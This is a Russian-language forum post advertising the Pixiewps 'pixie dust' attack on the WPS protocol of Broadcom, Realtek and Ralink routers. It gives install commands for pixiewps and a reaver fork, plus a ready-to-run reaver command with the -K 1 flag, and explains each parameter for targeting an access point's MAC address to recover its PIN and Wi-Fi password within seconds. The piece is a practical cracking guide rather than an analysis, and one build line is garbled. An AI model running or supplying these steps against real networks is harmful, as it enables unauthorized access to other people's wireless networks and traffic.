РЕКЛАМА НА ФОРУМЕ 

РЕКЛАМА НА ФОРУМЕ MultiVPN РЕКЛАМА НА ФОРУМЕ

Подбираем WPS за секунды | Pixiewps

Сообщения
29
Реакции
33
Баллы
13
Друзья, хотел бы вам поведать о новой уязвимости обнаруженной Домиником Бонгардом (презентация и видео) в итак дырявом WPS протоколе.
Реализуется она средствами скрипта написанного на С исследователем wiire под названием Pixiewps и называется «pixie dust attack». Уязвимость присутствует в точках доступа собранных на чипсетах Broadcom, Realtek и Ralink.

Главное преимущество этого софта в том, что он подбирает pin в течении нескольких секунд, после запускается стандартные reaver или bully, которые за 1 попытку подбирают пароль роутера.

Функционал Pixiewps внедрён в:
1. В форк reaver’a reaver-wps-fork-t6x (стандартные ключи -i, -c, -b и новый ключ -K 1).
2. В сканер WiFi сетей Wifite-ng.

Pixiewps требует наличия пакета libssl. Установка следующим кодом
sudo apt-get install libssl-dev
Установка pixiewps проста
1. Скачиваем архив со страницы на github’e https://github.com/wiire/pixiewps
2. Распаковываем
Переходим в папку src, собираем и устанавливаем
cd pixiewps-master/src/ make
make install
Удобнее всего использовать сразу через форк reaver’a reaver-wps-fork-t6x
1. Устанавливаем требуемые пакеты
sudo apt-get install libpcap-dev aircrack-ng sqlite3 libsqlite3-dev
2. Скачиваем https://github.com/t6x/reaver-wps-fork-t6x
3. Переходим в папку src, делаем файл исполняемым, запускаем, собираем, устанавливаем
cd /reaver-wps-fork-t6x-master/src
chmod 777 ./configure./configure
make
make install
Запуск reaver’a:

reaver -i monx -c x -b 00:AA:BB:11:22:33 -vv -K 1


• -i monx, где х - номер запущенного монитора адаптера беспроводной сети (в новых версиях airmon-ng имя монитора будет выглядеть по-другому wlanXmon, где X – порядковый номер адаптера).
• -c x канал вещания точки доступа, х – от 1 до 13.
• -b 00:AA:BB:11:22:33 – mac адрес атакуемой точки доступа.
• -vv – способ отображения данных.
• -K – ключ запуска атаки pixiewps. Если чипсет точки доступа Realtek, не нужно использовать отправку маленьких ключей – не используйте параметр (-S).



 
Сверху